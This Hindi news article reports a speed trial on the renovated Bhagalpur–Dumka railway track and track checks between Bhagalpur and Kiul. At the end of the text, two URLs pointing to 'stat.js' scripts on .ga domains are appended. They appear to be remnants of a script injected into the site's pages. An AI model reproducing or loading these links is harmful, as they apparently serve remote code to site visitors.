भागलपुर से दुमका तक की दूरी लगभग 105 किलोमीटर है। इस दूरी को अभी ट्रेने द्वारा 4 से 5 घंटे का समय लगता है। लेकिन रेल ट्रैक बदलें जाने के बाद गुरुवार को भागलपुर से दुमका के बीच स्पीड ट्रायल ट्रेन चलाकर पटरी पर रफ्तार की जांच हुई । जांच में किसी प्रकार की कोई दिक्कत नहीं है ।अब इसपर 80 किलोमीटर प्रति घंटा की रफ्तार से ट्रेन चल सकेंगी। जिसके बाद यह दूरी दो से ढाई घंटे में यह सफर किया जा सकेगा। यह यात्रियों के लिए एक बड़ी सौगात के बराबर है। जल्द ही रेलवे की ओर से स्पीड को लेकर कोई आदेश जारी।

 

 

भागलपुर में गुरुवार दोपहर को एईएन उज्जवल कुमार की देखरेख में 1:55 बजे दो कोच वाली स्पीड ट्रायल ट्रेन खुली और दुमका तक यह ट्रेन 80 किलोमीटर की रफ्तार से गई। वही दुमका स्टेशन पर ट्रेन 3:40 बजे पहुंच गई। जांच टीम में मुख्य पीडब्लूआई आरके सिंह, के के राय, और मालदा रेल मंडल के पीडब्लूआई प्रकाश कुमार मौजूद थे। रेलवे का कहना है कि लॉकडाउन में मिला समय में उनका सबसे ज्यादा ध्यान रेल पटरियों की मरम्मती और बदलने पर रहा है।

 

 

 

मिली समय के दौरान कई रेल सेक्सन पर तेजी से काम किए गए। भागलपुर से मदारहिल के बीच परियों को समय से बदल दिया गया है इस शक सेक्शन पर नई रेल पटरी में बिछड़ने के बाद ट्रेन परिचालन में किसी तरह की दिक्कत नहीं होंगे। जैसे की अभी ठंड का मौसम आ गया है ऐसे में रेल पटरियों के सिकुड़ने की संभावना बनी रहती है। गुरुवार को भागलपुर से किउल के बीच रेल परियों की जांच हुई। ट्रायल ट्रेन से अभियंता भागलपुर से किउल तक अप और डाउन लाइन ट्रक की जांच किया जांच के दौरान किसी तरह की कोई गड़बड़ी नहीं मिली।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published. Required fields are marked *